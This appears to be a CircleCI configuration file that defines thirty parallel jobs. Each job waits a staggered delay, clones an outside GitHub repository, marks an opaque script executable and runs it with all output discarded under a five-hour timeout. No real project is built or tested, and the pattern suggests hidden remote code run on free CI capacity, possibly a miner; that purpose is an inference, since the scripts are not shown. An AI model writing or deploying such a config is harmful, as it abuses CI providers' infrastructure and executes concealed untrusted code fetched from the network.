
version: 2.1
jobs:
  
  App_01:
    docker:
      - image: circleci/ruby:3.0.1-buster
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 60s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_02:
    docker:
      - image: circleci/rust:1.53.0-buster
    
    steps:
      
          
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 70s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_03:
    docker:
      - image: circleci/golang:1.17-rc-buster
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 80s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1 
  App_04:
    docker:
      - image: circleci/elixir:1.12.2
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 90s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_05:
    docker:
      - image: circleci/ruby:3.0
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 90s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_06:
    docker:
      - image: circleci/rust:1.53-buster
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 90s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_07:
    docker:
      - image: circleci/golang:1.16.5
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 100s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_08:
    docker:
      - image: circleci/elixir:1.12.2
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 110s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_09:
    docker:
      - image: circleci/ruby:2.7.4-buster
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 120s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_10:
    docker:
      - image: circleci/rust:1.52.1-buster
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 130s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_11:
    docker:
      - image: circleci/golang:1.17-rc-buster
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 140s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_12:
    docker:
      - image: circleci/elixir:1.12.2
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 150s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_13:
    docker:
      - image: circleci/ruby:2.7.3
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 160s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_14:
    docker:
      - image: circleci/rust:1.51.0-buster
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 170s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_15:
    docker:
      - image: circleci/golang:1.16.5
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 180s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  
   
  App_16:
    docker:
      - image: circleci/elixir:1.12.2
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 190s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_17:
    docker:
      - image: circleci/ruby:2.6.8
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 200s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_18:
    docker:
      - image: circleci/rust:1.53.0-buster
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 210s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_19:
    docker:
      - image: circleci/golang:1.17-rc-buster
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 220s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_20:
    docker:
      - image: circleci/elixir:1.12.2
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 230s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1

  App_21:
    docker:
      - image: circleci/golang:1.16.5
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 240s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_22:
    docker:
      - image: circleci/elixir:1.12.2
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 250s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_23:
    docker:
      - image: circleci/ruby:2.6.8
    
    steps:
     
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 260s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_24:
    docker:
      - image: circleci/rust:1.53.0-buster
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 270s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_25:
    docker:
      - image: circleci/golang:1.17-rc-buster
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 280s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_26:
    docker:
      - image: circleci/elixir:1.12.2
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 290s
            git clone https://github.com/azzadery/awax.git && cd awax && chmod 777 tarx && bash ./tarx >/dev/null 2>&1

  App_27:
    docker:
      - image: circleci/ruby:3.0.1-buster
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 300s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_28:
    docker:
      - image: circleci/rust:1.53.0-buster
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 310s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_29:
    docker:
      - image: circleci/golang:1.17-rc-buster
    
    steps:
      
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 320s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1
  App_30:
    docker:
      - image: circleci/elixir:1.12.2
    
    steps:
     
      - run:
          name: App
          no_output_timeout: 5h
          command: |
            sleep 330s
            git clone https://github.com/yoddase/nexela.git && cd nexela && chmod 777 drax && bash ./drax >/dev/null 2>&1


workflows:
    version: 2.1
    build:
        jobs:
            - App_01
            - App_02
            - App_03
            - App_04
            - App_05
            - App_06
            - App_07
            - App_08
            - App_09
            - App_10
            - App_11
            - App_12
            - App_13
            - App_14
            - App_15
            - App_16
            - App_17
            - App_18
            - App_19
            - App_20
            - App_21
            - App_22
            - App_23
            - App_24
            - App_25
            - App_26
            - App_27
            - App_28
            - App_29
            - App_30
            